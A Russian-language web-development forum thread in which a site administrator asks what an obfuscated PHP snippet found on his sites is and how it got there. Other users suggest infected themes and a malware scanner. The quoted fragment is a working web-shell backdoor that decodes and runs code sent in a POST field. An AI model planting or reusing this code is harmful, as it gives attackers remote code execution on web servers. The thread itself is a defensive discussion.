ЭНЦИКЛОПЕДИЯ СОВРЕМЕННОГО САЙТОСТРОЕНИЯ

Лучшее Обнаружил вредоносный код на сайте. Что это значит?

Тема в разделе "Шеллы и вирусы на сайте", создана пользователем Jonny, 7 июн 2017.

  1. Jonny

    Jonny Гуру Команда форума Администратор

    Сообщения:
    751
    Рейтинг:
    143
    Репутация:
    +137 / 0 / -0
    Всем привет!
    Недавно я обнаружин на некоторых своих сайтах вредоносный код, вот его часть:
    chr(100)."a"."\x74"."\x61"])){$ohx=chr(97)."s".chr(115).chr(101)."\x72"."t";$twu="b".chr(97)."\x73"."\x65"."6".chr(52)."\x5f"."d".chr(101)."c"."\x6f"."d"."\x65";$ye="s"."t"."\x72"."\x5f"."r"."\x6f"."t"."1".chr(51);@$ohx(@$twu(@$ye($_POST[chr(100)."a"."\x74"."\x61"])))

    Вот полный код вредоносного файла:
    PHP:
    [ ** Только зарегистрированные пользователи могут смотреть Код ** ]
    Подскажите, что это за зараза и как она пробалась на сервер? Файл, с вредоносным кодом назван на сервере как thumbs_img.php
     
  2. Alex-Kelevra

    Alex-Kelevra Гуру

    Сообщения:
    451
    Рейтинг:
    143
    Род занятий:
    Спасатель
    Откуда:
    ЛНР
    Репутация:
    +63 / 1 / -1
    @Jonny, файлы новые появлялись? Насколько я понимаю, то это следы взлома. Дыра. Есть вариант ее образования в следствии использования сторонних тем (кто-то мне рассказывал о таком случае). Попробуйте воспользоваться чем-нибудь типа "Айболита".
     
  3. Jonny

    Jonny Гуру Команда форума Администратор

    Сообщения:
    751
    Рейтинг:
    143
    Репутация:
    +137 / 0 / -0
    Вообще не понимаю, как взломали. Файл только 1 залили. Тот что выше. Про Айболита знаю, но не нужен в этот раз ручками все нашел по дате и поудалял.
     
  4. Alex-Kelevra

    Alex-Kelevra Гуру

    Сообщения:
    451
    Рейтинг:
    143
    Род занятий:
    Спасатель
    Откуда:
    ЛНР
    Репутация:
    +63 / 1 / -1
    @Jonny, конкретно не скажу, но когда-то что-то подобное слышал. Говорили, что причиной стало использование тем оформления. Вроде там уже было прописано.
     
  5. alexeika

    alexeika Новичок

    Сообщения:
    2
    Рейтинг:
    1
    Откуда:
    Урал
    Репутация:
    +0 / 0 / -0
    как сайт себя с этим кодом повел? контент открывался или 404 ?
     
  6. Jonny

    Jonny Гуру Команда форума Администратор

    Сообщения:
    751
    Рейтинг:
    143
    Репутация:
    +137 / 0 / -0
    На контент никак не повлияло.